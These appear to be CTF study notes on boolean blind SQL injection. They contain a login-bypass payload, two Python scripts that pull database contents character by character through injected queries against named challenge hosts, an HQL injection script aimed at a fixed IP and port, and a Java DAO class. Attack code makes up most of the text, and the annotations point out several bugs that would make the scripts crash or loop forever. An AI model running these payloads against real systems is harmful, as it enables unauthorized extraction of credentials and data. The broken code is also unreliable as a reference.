盲注就是回显只有对或者错的情况(如0,1)
1' or '1'='1' group by passwd with rollup having passwd is NULL — –
测试极客大挑战finalsql
import requests
import time
# Run-length counter for consecutive '!' characters; read by the stop
# condition inside getDatabase() below.
g=0
# Endpoint of the challenge instance that every probe is sent to.
host = "http://e7adeb0b-7190-4ea3-bd06-49e63e17e775.node4.buuoj.cn:81/backend/content_detail.php"
# Query-string parameters; 'id' is rewritten before each request.
parse={'id':''}
def getDatabase():  # originally: "get the database name"
    """Recover a string one character at a time through a boolean oracle.

    For each position ``i`` a binary search over printable ASCII is run.
    Every step writes a probe into ``parse['id']``, sends it to ``host`` and
    treats the presence of the word ``"title"`` in the response body as
    "condition true".  Each resolved character is appended to ``ans`` and the
    running value is printed.

    The commented-out templates below are alternative targets the author
    tried; the one actually formatted on the ``parse['id']`` line reads
    ``ctftraining.Flag``, so the function name is historical.

    Returns:
        None -- progress is printed, nothing is returned.
    """
    global host  # host is only read here, so this declaration has no effect
    ans=''
    for i in range(1,1000):
        # Search window over printable ASCII; mid is the threshold probed.
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
            time.sleep(0.1)  # fixed pacing between probes
            # Probe templates tried by the author (only the last one is live):
            # 1^(ascii(substr((select(database())),%d,1))<%d)^1
            # 1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))<%d)^1
            # 1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),%d,1))<%d)^1
            # 1^(ascii(substr((select(group_concat(password))from(users)),%d,1))<%d)^1
            # 1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))<%d)^1
            # 1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctftraining')),%d,1))<%d)^1
            # 1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_schema='ctftraining'(and)schema_name='ctftraining')),%d,1))<%d)^1
            # 1^(ascii(substr((select(group_concat(Flag))from(ctftraining.Flag)),%d,1))<%d)^1
            parse['id']="1^(ascii(substr((select(group_concat(Flag))from(ctftraining.Flag)),%d,1))<%d)^1" % (i,mid)
            res = requests.get(host,params=parse)
            if res.status_code!=200:
                # Non-200 is treated as transient: the same (i, mid) is
                # retried because neither bound changes before `continue`.
                # NOTE(review): a persistent error therefore loops forever.
                print('!200')
                continue
            # print(res.text)
            # Oracle: "title" present in the body <=> ascii(char) < mid.
            if "title" in res.text:
                high = mid
            else:
                low = mid+1
            mid=(low+high)//2
        # The probe tests "< mid", so the search converges on ascii(char) + 1;
        # that is why chr(mid-1) is appended below.  A final mid of 32 (every
        # probe answered true -- presumably what happens past the end of the
        # string) or >= 127 means no printable character is left.
        if mid <= 32 or mid >=127:
            break
        # mid-1 == 33 is '!'; five in a row is treated as junk and ends the loop.
        # NOTE(review): g is module-level but not declared global here, so the
        # in-place `g+=1` raises UnboundLocalError if this branch is reached.
        if(mid-1==33):
            g+=1
            if(g>=5):
                break
        else:
            g=0
        ans += chr(mid-1)
        print("database is -> "+ans)
getDatabase()  # runs immediately at import time; there is no __main__ guard
# news
# admin,contents
import requests
import time
# Endpoint of the second challenge instance that every probe is posted to.
url = "http://2adc3617-76d6-4705-84e4-1c0e3f21baa2.node4.buuoj.cn:81/search.php"
# Request parameters; "id" is rewritten before each probe.
payload = {
    "id" : ""
}
# Characters recovered so far.
result = ""
# Run length of consecutive '!' results; used as the stop condition.
g=0
# Same character-by-character binary search as the first script, but the
# probe tests "> mid" and the oracle word is "others", so the search converges
# on ascii(char) itself and chr(mid) is appended directly.
for i in range(1,1000):
    # Search window; 33 is '!' so a space (32) can never be produced.
    l = 33
    r =130
    mid = (l+r)>>1
    while(l<r):
        payload["id"] = "0^" + "(ascii(substr((select(group_concat(password))from(F1naI1y)),{0},1))>{1})".format(i,mid)
        html = requests.post(url,params=payload)
        print(payload)  # echoes every probe, useful for replaying the run
        # NOTE(review): requests' Response has no `code` attribute (the status
        # lives in `status_code`), so as written this raises AttributeError on
        # the first response; the retry path below is never reached.
        if(html.code!=200):
            time.sleep(0.2)
            print('错误,以延迟0.2秒',html.code)  # "error, delaying 0.2 s"
            continue
        # normal response content
        # Oracle: "others" present in the body <=> ascii(char) > mid.
        if "others" in html.text:
            l = mid+1
        else:
            r = mid
        mid = (l+r)>>1
    # NOTE(review): unreachable -- l starts at 33, so mid >= 33 and chr(mid)
    # is never " "; the '!' counter below is the effective terminator.
    if(chr(mid)==" "):
        break
    result = result + chr(mid)
    # stop when five consecutive '!' (ascii 33) are returned
    if(mid==33):
        g+=1
        if(g>=5):
            break
    else:
        g=0
    print(result)
print("tables: " ,result)
有一道题的java后端代码
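public class UserDaoImpl extends HibernateDaoSupport implements UserDao
{
    /**
     * Returns every User whose name equals the supplied value.
     *
     * The name is bound as a named HQL parameter rather than concatenated
     * into the query text, so quotes or HQL syntax inside the value are
     * treated as data and cannot change the shape of the query.
     *
     * @param name exact user name to match; may be null (matches nothing)
     * @return matching users, possibly empty, never null
     */
    @SuppressWarnings("unchecked")
    public List<User> findUserByName(final String name) {
        return (List<User>) this.getHibernateTemplate().findByNamedParam(
                "from User where name = :name", "name", name);
    }

    /**
     * Returns the users whose name and password both match the supplied
     * values.
     *
     * Both values are bound as named HQL parameters.  The query still
     * compares the supplied password directly with the stored column, so
     * the comparison is only as strong as whatever is stored there.
     * NOTE(review): this reads as a plaintext comparison -- confirm how the
     * password column is populated before relying on it.
     *
     * @param name     user name to match
     * @param password credential to match against the stored column
     * @return matching users, possibly empty, never null
     */
    @SuppressWarnings("unchecked")
    public List<User> loginCheck(final String name, final String password) {
        return (List<User>) this.getHibernateTemplate().findByNamedParam(
                "from User where name = :name and password = :password",
                new String[] {"name", "password"},
                new Object[] {name, password});
    }
}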
脚本
import requests
# One session so cookies persist across the probes below.
s=requests.session()
# Characters recovered so far.
flag=''
# Linear (not binary) search: for each position i, j is stepped through
# 1..254 and the first j for which the response is "large" identifies the
# character as j-1, which is held in p from the previous iteration.
for i in range(1,50):
    p=''
    for j in range(1,255):
        # %0A (newline) stands in for spaces inside the query text.
        payload="(select%0Aascii(substr(id,"+str(i)+",1))%0Afrom%0AFlag%0Awhere%0Aid<2)<'"+str(j)+"'"
        # The whole URL is built by string concatenation; nothing is encoded.
        url="http://111.200.241.244:55604/zhuanxvlogin?user.name=admin'%0Aor%0A"+payload+"%0Aor%0Aname%0Alike%0A'admin&user.password=1"
        r1=s.get(url)
        # Oracle: a body longer than 20000 chars <=> ascii(char) < j.
        # p!='' skips the j==1 case, where there is no previous character.
        # NOTE(review): if no j triggers, nothing is appended for this i and
        # the outer loop simply moves on, so the output can silently skip
        # positions.
        if len(r1.text)>20000 and p!='':
            flag+=p
            print(i,flag)
            break
        p=chr(j)
print()